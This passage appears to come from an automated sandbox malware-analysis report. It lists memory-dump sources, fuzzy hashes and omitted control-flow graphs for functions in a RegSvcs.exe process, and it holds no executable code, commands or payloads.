(function entry block 61bde00-61bde20, basic blocks through 61be234; calls 61b2dc8, 61b9548, 61bc588, 61bc708, 61bcc08; executed/not-executed edge list and rendered graph omitted)

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57d24643fe23c919ef422208be4fdfbceda9fa4539b327be6c37cef451399449
• Instruction ID: 6faf421b343387fc30feb32f569a9983e6d12b627efe37a67f30befba8ac50bc
• Opcode Fuzzy Hash: 57d24643fe23c919ef422208be4fdfbceda9fa4539b327be6c37cef451399449
• Instruction Fuzzy Hash: 4FC1BD78E00218CFEB54DFA5D994BDDBBB2AF89300F2490A9D409AB355DB359E81CF50

Control-flow Graph
(function entry block 61b2968-61b2988, basic blocks through 61b2da4; calls 61b2dc8, 61b310e, 61b2dc2, 61b9548, 61b9328, 61b992c; executed/not-executed edge list and rendered graph omitted)

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 710b2519f7350b789b289082031a648c98cb30b5d293af2b98717ed4b8b49644
• Instruction ID: 04282a3dd4a9c75c4096580228587bdd320f97bfdb2947537bb8fdbbc6610146
• Opcode Fuzzy Hash: 710b2519f7350b789b289082031a648c98cb30b5d293af2b98717ed4b8b49644
• Instruction Fuzzy Hash: C9C1BE78E00218CFEB54DFA5D944BADBBB2FF89300F1480A9D809AB355DB355A85CF10

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 528e4e09215310e52e192d1d870fcff58e68883d40041b719a7a1c121bb44133
• Instruction ID: f87982ff0b9e5fb9a5035c5048e1b87dddec11351bc02bdfdb6430611c6853ca
• Opcode Fuzzy Hash: 528e4e09215310e52e192d1d870fcff58e68883d40041b719a7a1c121bb44133
• Instruction Fuzzy Hash: 84A1F875E00219DFDB14DFA9D884A9DBBF2BF89310F14806AE409EB365DB349941DF50

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bebdf3100e5eacb68f8acf689f7f64719321e7c3a94414fd57f45d338c97b0b9
• Instruction ID: 41f110a488318fef0e55ef9474f573483fb1fe85c6dadd6de8911d673d1bd80c
• Opcode Fuzzy Hash: bebdf3100e5eacb68f8acf689f7f64719321e7c3a94414fd57f45d338c97b0b9
• Instruction Fuzzy Hash: 97A19075E01219CFEB68CF6AC954BDEBAF2AB88300F14D0AAD408A7254DB345A85CF51

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9593f99914041a71eb04838b90b4b2512044cf753f73839cd31c11d2861fe3ed
• Instruction ID: dcaaba92f0559b9acdbb4d31abab93e5c1547d818427fc7feff9c41d0071460b
• Opcode Fuzzy Hash: 9593f99914041a71eb04838b90b4b2512044cf753f73839cd31c11d2861fe3ed
• Instruction Fuzzy Hash: 75A11470D00208CFEB14DFA9C944BDDBBB1FF88314F249269E418A72A1DB759A85CF55

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1dc92d5f1a8cdfd50450494387b53a31224d2435966ed926614d85da58ed552e
• Instruction ID: cbb8c0c0f1cb9535d70a48bb5a8983068fa4a2c9ce8abc00e4ab69f5af484488
• Opcode Fuzzy Hash: 1dc92d5f1a8cdfd50450494387b53a31224d2435966ed926614d85da58ed552e
• Instruction Fuzzy Hash: 9AA1A075E01229CFEB68CF6AC954BDDBBF2AF88300F14D1A9D408A7254DB345A85CF50

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 945dda1aac0cbf88c38792bcbacb220f4c6801d7211b6deffca0dde493efac44
• Instruction ID: 33050a3b4bc8db9cfe6922e5db9eda753b171cd5a4710ef84925a672998b7f9d
• Opcode Fuzzy Hash: 945dda1aac0cbf88c38792bcbacb220f4c6801d7211b6deffca0dde493efac44
• Instruction Fuzzy Hash: B2A10470D00208CFEB14DFA9C944BDDBBB1FF89304F249269E409A7291DB759A85CF54
Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d81117ac76e71ef6658caecd4134b6333d74d36f4b328ae0b043d0ec4eb84c0
• Instruction ID: 680f81786164ca5315d5446d98ad16f793c226ca5dbdbf6710cb082d18b4f598
• Opcode Fuzzy Hash: 5d81117ac76e71ef6658caecd4134b6333d74d36f4b328ae0b043d0ec4eb84c0
• Instruction Fuzzy Hash: A3911370D00208CFEB54DFA8C984BDDBBB1FF49314F2492A9E419AB291DB759A85CF10

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d0023d80bf4607a4f1bbc04d651252ea628ac0ee6e9764aa246a7954cba2d5b
• Instruction ID: 9d58de2d199a600f9e208c8b259445aedd20c3752c424b7f3e409c7ba9478f53
• Opcode Fuzzy Hash: 0d0023d80bf4607a4f1bbc04d651252ea628ac0ee6e9764aa246a7954cba2d5b
• Instruction Fuzzy Hash: 4281DF74E01218CFEB54EFA9D890AEDBBB2FF89300F248129D815AB358DB355942CF50

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13f57c9ae94589882f2b667e66d783948db456454e7b3f3ce72a85f2084814cf
• Instruction ID: 38364f4c12df89242dba5e95f3246d17da7aed308722f0164d303b6ec00d4f79
• Opcode Fuzzy Hash: 13f57c9ae94589882f2b667e66d783948db456454e7b3f3ce72a85f2084814cf
• Instruction Fuzzy Hash: CC81D374E00219CFDB14DFAAD984B9DBBF2BF88310F18906AE409AB365DB349941DF50

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd05b1a7c6640106006596793a1ef2db03900755ed15282686b1889d015d6c21
• Instruction ID: ea50e597238f33aac911d3d661d831d36deb1a49f03fc565e20a0eae856d1a5f
• Opcode Fuzzy Hash: cd05b1a7c6640106006596793a1ef2db03900755ed15282686b1889d015d6c21
• Instruction Fuzzy Hash: 9681D574E00618CFDB14DFAAD944B9DBBF2BF88314F18806AE409AB365DB349941DF50

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18ee54d96e852ce449ca9eafffdaf1a52d3551a4ba119142311178c0dcc65a7
• Instruction ID: d164ed323d31bf78fb395b7e5e32931940ff10321de0acf5b6e4af0d35cd0b51
• Opcode Fuzzy Hash: b18ee54d96e852ce449ca9eafffdaf1a52d3551a4ba119142311178c0dcc65a7
• Instruction Fuzzy Hash: A081B374E00218CFDB14DFAAD984B9DBBF2BF89310F24806AE409AB365DB349945DF50

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ea3c40e19d6a1bbdcb4b082e3373133d4992ef3d93a1237e22136183e8dd426f
• Instruction ID: 7e30ccf20ef9cc4861569f686209ddc8cedda81ef96d23f202ad1f80eb81a43e
• Opcode Fuzzy Hash: ea3c40e19d6a1bbdcb4b082e3373133d4992ef3d93a1237e22136183e8dd426f
• Instruction Fuzzy Hash: AD81A274E00219CFDB14DFAAD894B9DBBF2BF88310F24806AE419AB365DB749941DF50
Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f20e55ad3759be377c7775bc3f2d2149b3bfe189542c6d3453151a1eb38735ca
• Instruction ID: aec1391f2049d6d49c95cd443931c53fbe798fd6a17f892caf7d9d3bba0b920e
• Opcode Fuzzy Hash: f20e55ad3759be377c7775bc3f2d2149b3bfe189542c6d3453151a1eb38735ca
• Instruction Fuzzy Hash: 03819274E00218CFEB14DFAAD984A9DBBF2FF88314F14806AE409AB365DB349945DF50

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74fd19b0c3ad6bc899e68e3c07b8bab195db900fbcab441a464fa7d779cf64cb
• Instruction ID: a6e229f4158473f1b7bccc22003ea4905303bf783613b742d4cbfea211cb6d7b
• Opcode Fuzzy Hash: 74fd19b0c3ad6bc899e68e3c07b8bab195db900fbcab441a464fa7d779cf64cb
• Instruction Fuzzy Hash: 2981C274E00219DFDB14DFAAD884B9DBBF2BF88300F24806AE419AB365DB349941DF50

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 71570ba796630658510d61e2c043d96727040bc8a069c52d6bf5a94d35d8c53c
• Instruction ID: 39b678d42f4d8736c169898755b0d35bc9bd892ca845214b47ba7547528ff2c4
• Opcode Fuzzy Hash: 71570ba796630658510d61e2c043d96727040bc8a069c52d6bf5a94d35d8c53c
• Instruction Fuzzy Hash: 0781B274E00219CFEB14DFAAD994B9DBBF2BF88310F14806AE409AB365DB349941DF50

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8f202af5aece19c3879fcc69c6011a68e46420191dd1fa72cfa725291f8ae079
• Instruction ID: ba045de0938a9f23d161609322bd2ce854791b81b0648b4ab2168d00628070ec
• Opcode Fuzzy Hash: 8f202af5aece19c3879fcc69c6011a68e46420191dd1fa72cfa725291f8ae079
• Instruction Fuzzy Hash: 5A71E275D01228CFDB68DF6AD9807DDBBF2AF89301F1090AAD409A7364DB345A82CF50

Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fbe487f47d244b6c951b4f1718045b501ac331a2a21ed919681d38816622c5be
• Instruction ID: ae619d6f734906c24550bbcc82a5bfe63f106be361799e77f67d70c07797693b
• Opcode Fuzzy Hash: fbe487f47d244b6c951b4f1718045b501ac331a2a21ed919681d38816622c5be
• Instruction Fuzzy Hash: 75719275E016288FEB68CF6AC954BDEBBF2BF88300F14C1A9D408A7254DB745A85CF10

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc84d9cfcd42910b5ff064865b6ace900fbba9ed0822fb5cafe057d3f27ece59
• Instruction ID: e7efc7cfbd6ec1d2275a15d6edb68341876f9b8d008e630fb774539a35eaaf7b
• Opcode Fuzzy Hash: cc84d9cfcd42910b5ff064865b6ace900fbba9ed0822fb5cafe057d3f27ece59
• Instruction Fuzzy Hash: 7151B774E00209DFDB18DFA6D894A9DBBB2FF89310F24D02AE815AB365DB345841DF54

Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 13f9be0dbbdc128b6dc956a8f293ffac154b8f6151efdc1b3afa4e6b09942109
                                                                                • Instruction ID: 6ee6183cc57c5252514ee9b61d5a0092862bb94e5102f830558d70adc1e67d65
                                                                                • Opcode Fuzzy Hash: 13f9be0dbbdc128b6dc956a8f293ffac154b8f6151efdc1b3afa4e6b09942109
                                                                                • Instruction Fuzzy Hash: E551B774E00209DFDB18DFAAD494A9DBBF2BF89300F24902AE819AB365DB345841DF14
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c96824f5d3d94b278640d341eaece712cdf4f876494ef7dd12deabc6b935bfa5
                                                                                • Instruction ID: 112f3e29e0738cc5479f4ef0836b4f5be89b4e2140b133d86f659bea469edac2
                                                                                • Opcode Fuzzy Hash: c96824f5d3d94b278640d341eaece712cdf4f876494ef7dd12deabc6b935bfa5
                                                                                • Instruction Fuzzy Hash: 81416771E016589BEB58CF6BD9547DEFAF3AFC9200F14C1AAC40CA6254EB740A85CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0caccb789b2d9badf214842ad2f325dfd14d37918675a6e5fe85750039f50047
                                                                                • Instruction ID: c631f40c621150d88a2fceca350b8cfaafdc2907991749910a5d64c6bbbf7ec4
                                                                                • Opcode Fuzzy Hash: 0caccb789b2d9badf214842ad2f325dfd14d37918675a6e5fe85750039f50047
                                                                                • Instruction Fuzzy Hash: CF41E470D01248CBEB58CFAAD5446EDBBF2FF89300F24D52AD419AB258DB345A45CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3b4d93280adb20df293acadda211a7bfadd43356d58031d0628e33668a55d6fb
                                                                                • Instruction ID: 17b7b963bf61ce3e63d3ab8c1de3bed9592865132a5513ab756962c77352580b
                                                                                • Opcode Fuzzy Hash: 3b4d93280adb20df293acadda211a7bfadd43356d58031d0628e33668a55d6fb
                                                                                • Instruction Fuzzy Hash: 2041C070E01248CBEB58DFAAD9446EDFBF2AF89300F24D12AC419BB259DB345946CF54

Control-flow Graph

• Executed
• Not Executed
(Graph rendering not recoverable as text: basic-block node and edge list for the function starting at block 61b992c omitted; the graph references a call to LdrInitializeThunk.)
APIs
• LdrInitializeThunk.NTDLL(00000000), ref: 061B9A6E
Memory Dump Source
• Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 9b8023f8e7deb3624ec76709a2206a46b9e3c13c20237c9cd084f7259fed7f6f
• Instruction ID: 4f8b597be8afa7f57ff9149cada22ed944064b3fed79b6f75789c195b6e1b844
• Opcode Fuzzy Hash: 9b8023f8e7deb3624ec76709a2206a46b9e3c13c20237c9cd084f7259fed7f6f
• Instruction Fuzzy Hash: 13116A74E002088FEB44DBF8C884EEDBBB5FB89314F158965E948A7255D7309942CF60

Control-flow Graph

• Executed
• Not Executed
(Graph rendering not recoverable as text: basic-block node and edge list for the function starting at block fdaef0 omitted; the graph references a call to fd7c88.)
Strings
Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: 3
• API String ID: 0-1842515611
• Opcode ID: bbe85733f363240d4539b6324a4dcb087c30f0eef2a378df9a367aa9aa1b2c19
• Instruction ID: 70eaf8ab296afd32cb55e88cf79c7bfc68fee8822a027fa430df1c978f0ce778
• Opcode Fuzzy Hash: bbe85733f363240d4539b6324a4dcb087c30f0eef2a378df9a367aa9aa1b2c19
• Instruction Fuzzy Hash: 62410535B00204CFDB059F69D8586AE7BF3AFC8720F18846AE51AD7391DE358D02DB95
Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3158527538493acd8d1764a11444c6b94294a8dbd16e128cb75b42a0a1f2d43
• Instruction ID: 0c37db68072597aa862b2a1bad5ba28c48de609077f3fb80f73dd22a09daf7a9
• Opcode Fuzzy Hash: a3158527538493acd8d1764a11444c6b94294a8dbd16e128cb75b42a0a1f2d43
• Instruction Fuzzy Hash: D912A6348A17538FE3546F38EAAD52EBA65FF1F323744EC00F94F81855DB7041A88A66

Control-flow Graph

• Executed
• Not Executed
(Graph rendering not recoverable as text: basic-block node and edge list for the function starting at block fde018 omitted; the graph references calls into the 061B0000 region, including fde8e8, fdf71f, 61b0b30, 61b178f, 61b1e70, 61b295a, 61bddff and 61bfc68.)
Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b4b71983ddc30fe3fab71d58ca11b68897bcbc5932a0081322758c0c96c22c0
• Instruction ID: 43d6892f5caa75d25d9b19c9a134e42e0eca22442f231605dc142c42c857fb86
• Opcode Fuzzy Hash: 3b4b71983ddc30fe3fab71d58ca11b68897bcbc5932a0081322758c0c96c22c0
• Instruction Fuzzy Hash: 4F12A7348A17538FE3542F38EAAD53ABA65FF1F323744EC00F94F81855DB7041A88A66

Control-flow Graph

• Executed
• Not Executed
(Graph rendering not recoverable as text: basic-block node and edge list for the function starting at block fd0c8f omitted; the graph references repeated calls to fd0780, fd5370 and fdd548 among others.)
Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 166d7284d74c6325fdbfb34e97b0ac54cd499bb3958c6de205d00a03c03abc84
• Instruction ID: aa49526e18649b5e4d2971689c7be137b1dfec2957cabfda7fe95758e420316a
• Opcode Fuzzy Hash: 166d7284d74c6325fdbfb34e97b0ac54cd499bb3958c6de205d00a03c03abc84
• Instruction Fuzzy Hash: 9852D47590021ACFDB54EF68E994B9DBBB2FF49300F1085A9D509AB359DB346E81CF80

Control-flow Graph

• Executed
• Not Executed
(Graph rendering not recoverable as text: basic-block node and edge list for the function starting at block fd0ca0 omitted; the graph references repeated calls to fd0780, fd5370 and fdd548 among others.)
Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 30b9df82548b242acf3affb2434b82d558782307df3cb4056ec4320fa5ed40da
• Instruction ID: 1ac003a0e24ab8ef08f634fa3a45396a39cb949d2a310ba50ef3b1e48c86e335
• Opcode Fuzzy Hash: 30b9df82548b242acf3affb2434b82d558782307df3cb4056ec4320fa5ed40da
• Instruction Fuzzy Hash: 0052D57590021ACFDB54EF68E995B9DBBB2FF48300F1085A9D509AB359DB346E81CF80

Control-flow Graph

• Executed
• Not Executed
(Graph rendering not recoverable as text: basic-block node and edge list for the function starting at block fd76f1 omitted; the graph references calls to fd7538, fd80c9 and fd63e0.)
Memory Dump Source
• Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f2ae8518b4afcc45a8cd8dea437cb4715913aa1063f03ad3b8bb56d2487f8b8c
• Instruction ID: 48914ec6445b5d3950a671f53068d880a63b23439751a99b9f313f85d6c8fa29
• Opcode Fuzzy Hash: f2ae8518b4afcc45a8cd8dea437cb4715913aa1063f03ad3b8bb56d2487f8b8c
• Instruction Fuzzy Hash: 04124930A04249DFCB15EF69C894A9EBBF2FF88314F18855AE4499B361E730ED41DB90

Control-flow Graph

• Executed
• Not Executed
(Graph rendering not recoverable as text: basic-block node and edge list for the function starting at block fd5f38 omitted; the graph references calls to fd5f29, fd69a0, fdafad, fdaef0 and fd62f0.)
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794416203.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_b7d000_RegSvcs.jbxd
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 653aa4bf94d8b84a9b73e5157d968dd7733fac78dbe3a6738eb1d6b0840c260a
                                                                                • Instruction ID: 6b10ddb6328fe356a321e01c47e33f7a9b9c0df825a6ff2d05256afe54cb6686
                                                                                • Opcode Fuzzy Hash: 653aa4bf94d8b84a9b73e5157d968dd7733fac78dbe3a6738eb1d6b0840c260a
                                                                                • Instruction Fuzzy Hash: 4811A135B016119FC7195B2AD454A3EB7A7EF897613194479E806CB350CF31DC029790
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 63f934a99df5c27505cff71db7d0cd3ef51fbf88b9a75e8aa7413a7d8c4a27c2
                                                                                • Instruction ID: 502169f83ed24f0dcaf37bc391563538384bc95f62c7ec55a33f6f0bd4cc1e29
                                                                                • Opcode Fuzzy Hash: 63f934a99df5c27505cff71db7d0cd3ef51fbf88b9a75e8aa7413a7d8c4a27c2
                                                                                • Instruction Fuzzy Hash: 6D2103B4D04249CFCB00EFA8D9546EEBFF4BF59301F14456AD809B7210EB305A95CBA6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 89791792f06fc8b064ab0ae2c41dee1d7c00c00f10df7f612dffc9cb1d9bbd65
                                                                                • Instruction ID: db2b6955dbf2eb94dfe04a51b2e3609a095af0669aa5bc32f0e5fe978642c538
                                                                                • Opcode Fuzzy Hash: 89791792f06fc8b064ab0ae2c41dee1d7c00c00f10df7f612dffc9cb1d9bbd65
                                                                                • Instruction Fuzzy Hash: CC112930D0020ADFEB00EFB8D951B9EBBF2EB84304F04C5A9D0089B265EB345A499B91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: edf28e4ab2ae5226a13ec9e205813f287edc236f59ce7ab182d25a21754a3c1c
                                                                                • Instruction ID: ca58152fa9c281ec0e8430b8071b255b34f176fcbcc092830af0107b8e68e835
                                                                                • Opcode Fuzzy Hash: edf28e4ab2ae5226a13ec9e205813f287edc236f59ce7ab182d25a21754a3c1c
                                                                                • Instruction Fuzzy Hash: 40214E74D10229CFDB64DF68D994B9DBBB1BF49304F1090AAD409AB361DB34AD85DF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 34b85494a169d4270d6b6ef7c186f8bffbe65bd97c73aeacabd12845a6c25b03
                                                                                • Instruction ID: e448216a01c301c36a26e4298fca1c1a846588d569d4aa7fcb2fc220a81ec629
                                                                                • Opcode Fuzzy Hash: 34b85494a169d4270d6b6ef7c186f8bffbe65bd97c73aeacabd12845a6c25b03
                                                                                • Instruction Fuzzy Hash: 6D01B532B04214AFCB119EA99810AAF3BABDFC9B50B1C8067F905DB385D975CE15A7D0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794416203.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_b7d000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae9d72851915523878f16b9cd24c13245b133e2210c8b1622926dc5e3fa9d021
                                                                                • Instruction ID: 4ab14a627462d4541b1d06016d85cc8fba6231a3d80ce12b5d7762af13120b6f
